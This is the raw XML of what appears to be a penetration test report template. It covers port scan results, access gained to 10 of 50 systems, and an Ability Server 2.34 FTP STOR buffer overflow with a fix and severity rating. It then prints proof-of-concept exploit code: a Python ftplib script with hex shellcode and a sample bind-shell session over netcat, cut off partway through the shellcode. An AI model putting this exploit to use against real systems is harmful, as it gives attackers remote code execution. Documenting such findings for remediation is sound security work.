        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716"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efefef"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="efefef"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Ports Open</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43">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.1</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44">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP: 21,22,25,80,443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45">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.2</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46">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP: 22,55,90,8080,80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47">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.3</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48">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">TCP: 1433,3389 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">UDP: 1434,161</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line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2s8eyo1" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 – Penetration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, John was able to successfully gain access to 10 out of the 50 systems.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="1077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2.3333333333335"/>
        <w:gridCol w:w="3592.3333333333335"/>
        <w:gridCol w:w="3592.3333333333335"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3592.3333333333335"/>
            <w:gridCol w:w="3592.3333333333335"/>
            <w:gridCol w:w="3592.3333333333335"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716"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b w:val="1"/>
                <w:color w:val="efefef"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="efefef"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Server IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716"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b w:val="1"/>
                <w:color w:val="efefef"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="efefef"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="aa0716"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b w:val="1"/>
                <w:color w:val="efefef"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:color w:val="efefef"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Foothold / Vulnerability / Exploit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52">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.1</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53">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54">
            <w:pPr>
              <w:spacing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55">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.2</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56">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57">
            <w:pPr>
              <w:spacing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58">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">192.168.1.3</w:t>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59">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5A">
            <w:pPr>
              <w:spacing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5B">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5C">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5D">
            <w:pPr>
              <w:spacing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5E">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5F">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60">
            <w:pPr>
              <w:spacing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61">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62">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63">
            <w:pPr>
              <w:spacing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64">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65">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66">
            <w:pPr>
              <w:spacing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67">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68">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69">
            <w:pPr>
              <w:spacing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6A">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6B">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6C">
            <w:pPr>
              <w:spacing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6D">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6E">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6F">
            <w:pPr>
              <w:spacing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70">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71">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72">
            <w:pPr>
              <w:spacing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73">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74">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75">
            <w:pPr>
              <w:spacing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76">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77">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78">
            <w:pPr>
              <w:spacing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79">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7A">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7B">
            <w:pPr>
              <w:spacing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7C">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7D">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7E">
            <w:pPr>
              <w:spacing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7F">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80">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81">
            <w:pPr>
              <w:spacing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82">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83">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84">
            <w:pPr>
              <w:spacing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85">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86">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87">
            <w:pPr>
              <w:spacing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88">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89">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8A">
            <w:pPr>
              <w:spacing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8B">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8C">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8D">
            <w:pPr>
              <w:spacing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8E">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8F">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90">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>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91">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92">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>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top w:w="80.0" w:type="dxa"/>
              <w:left w:w="80.0" w:type="dxa"/>
              <w:bottom w:w="80.0" w:type="dxa"/>
              <w:right w:w="80.0" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4oniaedy71o5" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_2m8unhtwkkmy" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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1"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_esbrx11khsmj" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.0 - Vulnerabilities &amp; Exploits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rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dy0ywgqpfvzw" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.10 - Vulnerability Exploited:  Ability Server 2.34 FTP STOR Buffer Overflow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_65ak4lmpas42" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.11 - System Vulnerable: 172.16.203.134</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Explanation: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Ability Server 2.34 is subject to a buffer overflow vulnerability in STOR field. Attackers can use this vulnerability to cause arbitrary remote code execution and take complete control over the system. When performing the penetration test, John noticed an outdated version of Ability Server running from the service enumeration phase. In addition, the operating system was different from the known public exploit. A rewritten exploit was needed in order for successful code execution to occur. Once the exploit was rewritten, a targeted attack was performed on the system which gave John full administrative access over the system.</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Vulnerability Fix:</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The publishers of the Ability Server have issued a patch to fix this known issue.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It can be found here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.code-crafters.com/abilityserver/</w:t>
        </w:r>
      </w:hyperlink>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Severity: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b w:val="1"/>
          <w:color w:val="aa0716"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical</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Proof of Concept Code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table5"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="100.0" w:type="pct"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10777"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="10777"/>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Fonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">###################################</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Ability Server 2.34 FTP STOR Buffer Overflow   </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Advanced, secure and easy to use FTP Server.</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21 Oct 2004 - muts                                 </w:t>
              <w:tab/>
              <w:t xml:space="preserve"> </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D:\BO&gt;ability-2.34-ftp-stor.py                  </w:t>
              <w:tab/>
              <w:t xml:space="preserve"> </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D:\data\tools&gt;nc -v 127.0.0.1 4444          </w:t>
              <w:tab/>
              <w:t xml:space="preserve"> </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localhost [127.0.0.1] 4444 (?) open   </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Microsoft Windows XP [Version 5.1.2600]   </w:t>
              <w:tab/>
              <w:t xml:space="preserve"> </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(C) Copyright 1985-2001 Microsoft Corp.   </w:t>
              <w:tab/>
              <w:t xml:space="preserve"> </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D:\Program Files\abilitywebserver&gt;           </w:t>
              <w:tab/>
              <w:t xml:space="preserve"> </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w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> </w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">import</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ftplib</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">from</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ftplib </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">import</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> FTP</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">import</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> struct</w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\n\n################################"</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fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\nAbility Server 2.34 FTP STOR buffer Overflow"</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fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\nFor Educational Purposes Only!\n"</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fcc28c"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">print</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a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"###################################"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> </w:t>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># Shellcode taken from Sergio Alvarez's "Win32 Stack Buffer Overflow Tutorial"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve"> </w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc = </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\xe0\x66"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x66\x4f\x97\xb6"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x6a\x57\x49\xba"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x39\x42\x9f\xbb"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x6a\x97\x99\xfc"</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">sc += </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="a2fca2"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:shd w:fill="333333" w:val="clear"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">"\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\xb0\x95\x05\x61"</w:t>
            </w:r>
